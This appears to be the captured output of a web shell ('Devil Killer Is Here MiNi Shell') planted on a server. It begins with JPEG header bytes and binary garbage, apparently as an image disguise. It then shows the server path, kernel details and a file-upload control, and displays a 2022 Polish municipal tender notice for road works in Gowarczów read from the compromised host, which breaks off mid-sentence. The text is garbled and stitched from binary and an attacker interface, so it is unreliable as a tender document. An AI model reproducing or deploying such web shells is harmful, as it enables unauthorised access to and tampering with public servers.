JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220330/0010311001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja infrastruktury drogowej na obszarze gminy Gowarczów <br/>- III wniosek do 5 mln. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Gowarczów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670223681</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac XX-lecia 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gowarczów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-225</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">486724037</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">486724744</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gowarczow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://gowarczow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja infrastruktury drogowej na obszarze gminy Gowarczów <br/>- III wniosek do 5 mln. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ac01dd66-affe-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00103110</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00037105/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.17 Modernizacja infrastruktury drogowej na obszarze gminy Gowarczów - III wniosek do 5 mln.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gowarczow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gowarczow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">wymagania techniczne i organizacyjne<br/>wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu opisane zostały w Regulaminie korzystania z<br/>platformy zakupowej zamawiającego Marketplanet pod adresem https://oneplace.marketplanet.pl/regulamin</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), informuję, że: administratorem Pani/Pana danych osobowych jest : Wójt Gminy Gowarczów, ul. Plac XX Lecia 1;<br/>26-225 Gowarczów , tel: 48 6724037 fax: 486724744, e-mail: sekretariat@gowarczow.pl; z inspektorem ochrony danych osobowych<br/>w Gminie Gowarczów, ul. Plac XX Lecia 1; 26-225 Gowarczów, kontaktować można się pod adresem e-mail: a<br/>kolodziejczyk@gowarczow.pl.Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego:<br/>ORG.271.1.2022 pod nazwą: „Modernizacja infrastruktury drogowej na obszarze gminy Gowarczów - poprawa stanu dróg&#34;<br/>prowadzonym w trybie podstawowym na podstawie art. 275 ust 1 pzp - Roboty budowlane<br/>osobowe przetwarzane będą w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego, zgodnie z wymaganiami<br/>określonymi w ustawie z dnia 11 września 2019 r. Pzp (Dz. U. z 2019 r. poz. 2019), a następnie zawarcia umowy z wybranym<br/>wykonawcą, jej realizacji oraz<br/>rozliczenia,; podstawą przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. b) i c) ogólnego rozporządzenia o ochronie<br/>danych z dnia 27 kwietnia 2016 r., tj. przetwarzanie jest niezbędne do wykonania umowy, której stroną jest osoba, której dane<br/>dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy oraz przetwarzanie jest niezbędne<br/>do wypełnienia obowiązku prawnego ciążącego na administratorze, wynikającego z ustawy Pzp; odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy pzp; posiada Pan/i prawo do:• żądania dostępu do treści swoich<br/>danych osobowych, ich sprostowania lub ograniczenia przetwarzania,• wniesienia skargi do organu nadzorczego - Prezesa Urzędu<br/>Ochrony Danych<br/>Osobowych; nie przysługuje Pani/u• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;• prawo<br/>do przenoszenia danych osobowych, o którym mowa w art. 20RODO;• na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Pan/i dane osobowe<br/>nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu; Pan/i a dane osobowe będą przechowywane,<br/>zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat liczonych od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy informujemy iż:− w przypadku gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku,<br/>zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu. − skorzystanie<br/>przez osobę,<br/>której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozp. 2016/679,<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień<br/>umowy w zakresie niezgodnym z<br/>ustawą. − wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozp. 2016/679, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ORG.271.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia publicznego obejmuje 6 odcinków dróg klasy D o łącznej długości 7 770 m do przebudowy i remont 1 odcinka na długości 495 m. Roboty w głównej mierze polegać będą na poszerzeniu jezdni, wykonaniu mijanek o szerokości jezdni 5 m., utwardzeniu poboczy 0,75 m., podbudowie i nałożeniu nowej nawierzchni: <br/><br/>1)	Przebudowa drogi gminnej niepublicznej w miejscowości Brzeźnica<br/>2)	Przebudowa drogi gminnej nr 324004T Korytków - Kurzacze<br/>3)	Przebudowa drogi gminnej nr 324003T Gowarczów – Komaszyce <br/>4)	Przebudowa drogi gminnej nr 324006T Kamienna Wola - Kurzacze<br/>5)	Przebudowa drogi gminnej nr 324005T Korytków – Bernów <br/>6)	Przebudowa drogi gminnej nr 324003T Gowarczów - Eugeniów<br/>7)	Przebudowa - remont drogi gminnej wewnętrznej w miejscowości Borowiec<br/><br/>Zadnie jest podzielone na 2 etapy. W ramach 1 etapu Wykonawca wykona zamówienie w części stanowiącej nie wyższej niż 50 % wartości umowy. Zakres robót wchodzących w skład poszczególnych etapów oraz kolejność realizacji odcinków I i II etapu będzie określona harmonogramem rzeczowo - finansowym realizacji robót, zwanym dalej „harmonogramem”. Harmonogram rzeczowo – finansowy winien być dostosowany do terminów realizacji inwestycji i transz płatności wynagrodzenia. Harmonogram rzeczowo- finansowy zostanie zaakceptowany przez Zamawiającego po przedstawieniu propozycji przez Wykonawcę, w terminie 7 dni od dnia zawarcia umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45100000-8 - Przygotowanie terenu pod budowę</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium : C – cena brutto oferty 60% ; G – okres gwarancji jakości i rękojmi na cały zakres zamówienia 40%; Razem 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości i rękojmi na cały zakres zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące: 1. ZDOLNOŚCI DO WYSTĘPOWANIA W OBROCIE GOSPODARCZYM:<br/>Zamawiający nie określa warunków w ww. zakresie<br/>2. UPRAWNIEŃ DO PROWADZENIA OKREŚLONEJ DZIAŁALNOŚCI GOSPODARCZEJ LUB ZAWODOWEJ, O ILE<br/>WYNIKA TO Z ODRĘBNYCH PRZEPISÓW:<br/>Zamawiający nie określa warunków w ww. zakresie.<br/>3. SYTUACJI EKONOMICZNEJ LUB FINANSOWEJ:<br/>Zamawiający nie określa warunków w ww. zakresie.<br/>4. ZDOLNOŚCI TECHNICZNEJ LUB ZAWODOWEJ:<br/>doświadczenie wykonawcy:<br/>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy (a w przypadku świadczeń okresowych lub<br/>ciągłych nadal wykonuje)- w tym okresie, zrealizował minimum 1 robotę budowlaną polegającą na budowie, przebudowie<br/>lub remoncie drogi o długości co najmniej 1,00 km.<br/>Uwaga:<br/>1. Wykonawca zobowiązany jest wyodrębnić rodzajowo i kilometrowo,<br/>stanowiące podstawę wykazania doświadczenia;<br/>2. Dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartość lub wartości zostaną podane w walutach innych<br/>niż PLN, Zamawiający przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji<br/>ogłoszenia<br/>o zamówieniu w Biuletynie Zamówień Publicznych, jeżeli w dniu publikacji ogłoszenia<br/>o zamówieniu w Biuletynie Zamówień Publicznych, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za<br/>podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o<br/>zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany.<br/>a) kwalifikacje zawodowe kadry technicznej:<br/>Wykonawca powinien wykazać, że dysponuje lub będzie dysponować co najmniej:<br/>jedną osobą, która będzie pełniła funkcję kierownika budowy z uprawnieniami do pełnienia samodzielnej funkcji technicznej<br/>przy kierowaniu robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w<br/>wymaganym zakresie oraz posiadającego aktualne na dzień składania ofert zaświadczenie o przynależności do Polskiej<br/>Izby Inżynierów Budownictwa, (Kierownik Budowy)<br/>** Kierownik budowy oraz kierownicy robót powinni posiadać ważne uprawnienia budowlane, o których mowa w ustawie z<br/>dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze zm.) oraz w Rozporządzeniu Ministra Inwestycji i<br/>Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji<br/>technicznych w budownictwie (Dz.U. z 2019 r. poz. 831) lub odpowiadające im kwalifikacje nadane na podstawie uprzednio<br/>obowiązujących przepisów prawa lub odpowiednich przepisów upoważniające do kierowania robotami budowlanymi w<br/>zakresie objętym przedmiotem zamówienia. W przypadku Wykonawców zagranicznych dopuszcza się również kwalifikacje<br/>zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy prawo budowlane, z uwzględnieniem<br/>postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>Ogłoszenie nr 2022/BZP 00093961/01 z dnia 2022-03-22<br/>2022-03-22 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>członkowskich Unii Europejskiej (Dz.U. z 2020r. poz. 220).<br/>b) wykonawca wykaże kwalifikacje zawodowe kadry technicznej w celu spełnienia tego warunku wskazując:<br/>- min 1 osobę, która będzie pełniła funkcję kierownika budowy z uprawnieniami do pełnienia samodzielnej funkcji technicznej<br/>przy kierowaniu robotami budowlanymi w specjalności drogowej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1<br/>ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona,<br/>do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:<br/>9.2.1 potwierdzających brak podstaw wykluczenia:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 ze zm.), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – wg Załącznika nr 5;<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;(jeżeli wykonawca wskaże w formularzu ofertowym (zamawiający samodzielnie pobierze z<br/>ogólnodostępnych rejestrów)<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast informacji z Krajowego<br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej– składa dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie<br/>ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza<br/>nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w<br/>przepisach miejsca wszczęcia tej procedury.<br/>Dokumenty potwierdzające w/w okoliczności powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>c) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia<br/>z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 1 i 2 ustawy Pzp,<br/>b) art. 108 ust. 1 pkt 3 ustawy Pzp, dotyczącą wydania prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o<br/>zaleganiu podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne.<br/>c) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>d) art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>e) art. 109 ust. 1 pkt 1, 3 i pkt 5 - 10 ustawy Pzp - wg załącznika 12 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie<br/>z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem<br/>najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>potwierdzających spełnianie warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej (doświadczenie,<br/>kwalifikacje zawodowe kadry technicznej): a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, długości odcinka, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a 